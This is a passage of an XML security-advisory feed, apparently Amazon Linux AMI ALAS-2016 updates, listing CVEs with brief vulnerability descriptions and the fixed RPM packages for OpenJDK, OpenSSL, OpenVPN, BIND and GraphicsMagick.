</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5423" title="" id="CVE-2016-5423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5424" title="" id="CVE-2016-5424" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-libs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.14" release="1.62.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql93-server-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.14" release="1.62.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.14-1.62.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.14" 
release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.14" release="1.62.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.14-1.62.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.9" 
release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package 
name="postgresql94-plperl" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.9" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.9-1.67.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.18" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.18-1.59.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.9" release="1.67.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql94-libs-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.18" 
release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-plperl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.9" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.9-1.67.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.18-1.59.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.18" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.18-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-748</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-748: important priority package 
update for java-1.6.0-openjdk</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3606:
Unspecified vulnerability in Oracle Java SE 7u101 and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Hotspot.
1356963:
CVE-2016-3606 OpenJDK: insufficient bytecode verification (Hotspot, 8155981)
CVE-2016-3550:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality via vectors related to Hotspot.
1357506:
CVE-2016-3550 OpenJDK: integer overflows in bytecode streams (Hotspot, 8152479)
CVE-2016-3508:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3500.
1357015:
CVE-2016-3508 OpenJDK: missing entity replacement limits (JAXP, 8149962)
CVE-2016-3500:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3508.
1357008:
CVE-2016-3500 OpenJDK: maximum XML name limit not applied to namespace URIs (JAXP, 8148872)
CVE-2016-3458:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; and Java SE Embedded 8u91 allows remote attackers to affect integrity via vectors related to CORBA.
1357494:
CVE-2016-3458 OpenJDK: insufficient restrictions on the use of custom ValueHandler (CORBA, 8079718)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3458" title="" id="CVE-2016-3458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3500" title="" id="CVE-2016-3500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3508" title="" id="CVE-2016-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3550" title="" id="CVE-2016-3550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3606" title="" id="CVE-2016-3606" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-devel" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.40-1.13.12.6.75.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.40" release="1.13.12.6.75.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.40-1.13.12.6.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-749</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-749: important priority package update for openssl</title><issued date="2016-09-22 16:00:00" /><updated date="2016-09-26 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6304:
It was discovered that if a client continually requests renegotiation, sending an excessively large OCSP Status Request extension each time, there will be unbounded memory growth on the server, eventually leading to a denial of service through memory exhaustion.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6304" title="" id="CVE-2016-6304" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-static" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-15.95.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.95.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-15.95.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.95.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-1.0.1k-15.95.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-750</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-750: medium priority package update for openvpn</title><issued date="2016-09-27 10:30:00" /><updated date="2016-09-27 10:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6329:
Ciphers with 64-bit block sizes used in CBC mode were found to be vulnerable to a birthday attack when key renegotiation does not happen frequently, or at all, in long-running connections. The Blowfish cipher, as used in OpenVPN by default, is vulnerable to this attack, which allows a remote attacker to recover partial plaintext information (the XOR of two plaintext blocks).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6329" title="" id="CVE-2016-6329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn" version="2.3.12" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.3.12-1.16.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.12" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.3.12-1.16.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.3.12" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.3.12-1.16.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.3.12" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.3.12-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-751</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-751: important priority package update for bind</title><issued date="2016-09-28 15:45:00" /><updated date="2016-09-28 15:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2776:
A denial of service flaw was found in the way BIND constructed a response to a query that met certain criteria. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS request packet.
1378380:
CVE-2016-2776 bind: assertion failure in buffer.c while building responses to a specifically constructed request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2776" title="" id="CVE-2016-2776" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-sdb" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.48.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.48.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-752</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-752: medium priority package update for GraphicsMagick</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7449:
The TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software.
CVE-2016-7448:
The Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service.
CVE-2016-7447:
A possible heap overflow was discovered in the EscapeParenthesis() function.
CVE-2016-7446:
Various issues were found in the processing of SVG files in GraphicsMagick.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7446" title="" id="CVE-2016-7446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7447" title="" id="CVE-2016-7447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7448" title="" id="CVE-2016-7448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7449" title="" id="CVE-2016-7449" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="GraphicsMagick-c++" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-doc" version="1.3.25" release="1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/GraphicsMagick-doc-1.3.25-1.9.amzn1.noarch.rpm</filename></package><package name="GraphicsMagick" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-perl" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-perl-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-c++-devel-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-devel" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-devel-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-debuginfo" version="1.3.25" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/GraphicsMagick-debuginfo-1.3.25-1.9.amzn1.x86_64.rpm</filename></package><package name="GraphicsMagick-c++-devel" version="1.3.25" release="1.9.amzn1" epoch="0" 
